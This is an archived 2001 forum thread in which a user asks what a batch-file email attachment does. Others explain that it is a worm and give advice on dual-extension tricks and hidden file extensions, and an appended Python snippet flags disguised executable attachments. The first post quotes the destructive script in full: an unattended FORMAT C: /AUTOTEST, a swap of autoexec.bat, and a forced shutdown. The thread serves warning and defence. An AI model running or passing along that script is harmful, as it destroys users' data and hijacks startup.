what would this command do
MARKBLACK
09-10-2001, 06:23 PM
Hi all, recently someone sent me this batch file
attached to an email, I did click on it at first,
it started to open a DOS window then I realised
it may cause me problems so I cancelled it
FORMAT C: /AUTOTEST
xcopy rightsnet.bat c:\
rename c:\autoexec.bat auto.bat
rename c:\rightsnet.bat autoexec.bat
RUNDLL SHELL32.DLL,SHExitWindowsEx 2
I am just wondering if this could have caused me problems
as soon as I saw the format C: message I stopped it
just wondering what it's all about.
MB
------------------
MB
If we can't find the answer we keep on trying....never afraid to ask again.
/AUTOTEST Formatting proceeds without further user input or warning messages. As this will also work with hard drives, it is probably advisable to preconfigure the command in a batch file rather than using it directly from the command line. The AUTOTEST switch can be used in conjunction with the /U, /S, and /F switches. It is not compatible with /Q (causing an error message) and /V is ignored.
Then it copies rightsnet.bat to C:, then renames autoexec.bat and then makes rightsnet.bat your new autoexec, and finally, exits windows....
Looks, sounds, smells like a WORM...good thing you stopped it, and a lesson why you shouldn't open attachments unless you are expecting them and know what is in them. It may be a good idea to scan your system with an anti-virus program...the file that it was supposed to copy may still be hanging around.
------------------
mjc
Links list:Computer Links (http://www.dreamwater.org/tech/mjc/index.htm)
Celts are the men that heaven made mad, For all their battles are merry and their songs are all sad.
Whyzman
09-10-2001, 07:06 PM
Wow...
I received an email the other day with a .bat attachment also. Word seems to be out that if the email contains a .txt or a .doc that you're OK to open since there are no executable commands. However, just like that I love you virus out of New Zealand or wherever it originated. The "way too much time on their hands hackers" are doing a dual extension and tricking folks. The one I actually received was a .txt.bat
May all your dealings in life be win/win!
Whyzman
Paleo Pete
09-10-2001, 11:42 PM
Those are tricky ones. If you have Windows Explorer set to show all files, it will show the dual extension. (View\Folder Options\Advanced tab) If you have it set to hide known file types, or don't have the "show all files" option set, it will only show the first one, .txt or .doc, and not the second one, which is .bat or .exe usually.
That's how I recognized the sircam virus, I ALWAYS set mine to show all files, so I saw the dual extension right away and knew something was not right...you got lucky, many people don't set that option, or don't even know about it. By default Windows hides extensions. MS needs to change that...
------------------
Support the right to keep and arm bears.
Note: Please post your questions on the forums, not in my email.
Computer Information Links (http://www.geocities.com/paleopete/)
MARKBLACK
09-11-2001, 09:32 AM
Hi Paleo Pete, the guy who sent this batch file has over the past
2 months been sending me emails and I thought I had got to know him
quite well, this is worth pointing out that these guys seem
to be alright for a few weeks then when they get your trust they send
attachments like this, I am normally very careful I am the one normally
warning others it just shows how these things can turn out
------------------
MB
If we can't find the answer we keep on trying....never afraid to ask again.
Nay, it's not really your fault. From the command lines you've just listed, it definitely smells like a slimy virus to me. Swapping your autoexec file? That's absolutely not right!
As for your friend, he be innocent actually coz some worms access the victim's address book and forward itself to everyone inside. It might have reached you this way without your friend's knowledge.
Juz a thought: is he using MS Outlook?
Whyzman
09-11-2001, 12:21 PM
Mark,
This dude you were communicating with may not be a "perp." These viri go after your email address book so one's defenses would be down to opening them up. The one I received was from someone I had a business dealing with over a year ago. I recognized the name but was alerted when I saw the dual extension.
As Pete pointed out many will be at risk not knowing that the default is to hide extensions. Many folks will know to stay clear of .exe or .bat, however, the "I love you" virus went after a little known .vbs using a dual extension to a .doc if I remember correctly. It would be nice if the ISPs would use filters to advise you of the executable nature of the extensions just as a service to their customers.
May all your dealings in life be win/win!
Whyzman
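Added example, not written by any poster in this thread: a sketch of the kind of attachment filter discussed above, which flags a dual extension such as .txt.bat and shows the name a user would see with extensions hidden. The extension lists, function names and sample filenames (other than rightsnet.bat) are assumptions made for this illustration.

```python
import os

# Assumption: illustrative lists for this example, not a complete policy.
EXECUTABLE_EXTS = {".bat", ".cmd", ".com", ".exe", ".pif", ".scr", ".vbs", ".js"}
DECOY_EXTS = {".txt", ".doc", ".jpg", ".gif", ".pdf", ".xls", ".zip"}


def classify_attachment(filename):
    """Return (verdict, shown_name) for one attachment filename.

    verdict:    "double-extension", "executable" or "ok"
    shown_name: the name as displayed when the final extension is hidden
    """
    # Keep only the file name; accept both path separators.
    name = os.path.basename(filename.replace("\\", "/")).rstrip(". ")
    stem, last = os.path.splitext(name)
    shown = stem if last else name
    if last.lower() not in EXECUTABLE_EXTS:
        return "ok", shown
    # Tolerate padding between the inner extension and the real one.
    inner = os.path.splitext(stem.rstrip(". "))[1].lower()
    if inner in DECOY_EXTS:
        return "double-extension", shown.rstrip(". ")
    return "executable", shown


def warnings_for(filenames):
    """Build one warning line per flagged attachment."""
    lines = []
    for fn in filenames:
        verdict, shown = classify_attachment(fn)
        if verdict == "double-extension":
            lines.append(f"{fn}: executable disguised as '{shown}'")
        elif verdict == "executable":
            lines.append(f"{fn}: executable attachment")
    return lines


if __name__ == "__main__":
    # Constructed sample names, except rightsnet.bat from the first post.
    sample = ["notes.txt.bat", "letter.doc.vbs", "rightsnet.bat",
              "report.doc", "photo.jpg"]
    for line in warnings_for(sample):
        print(line)
```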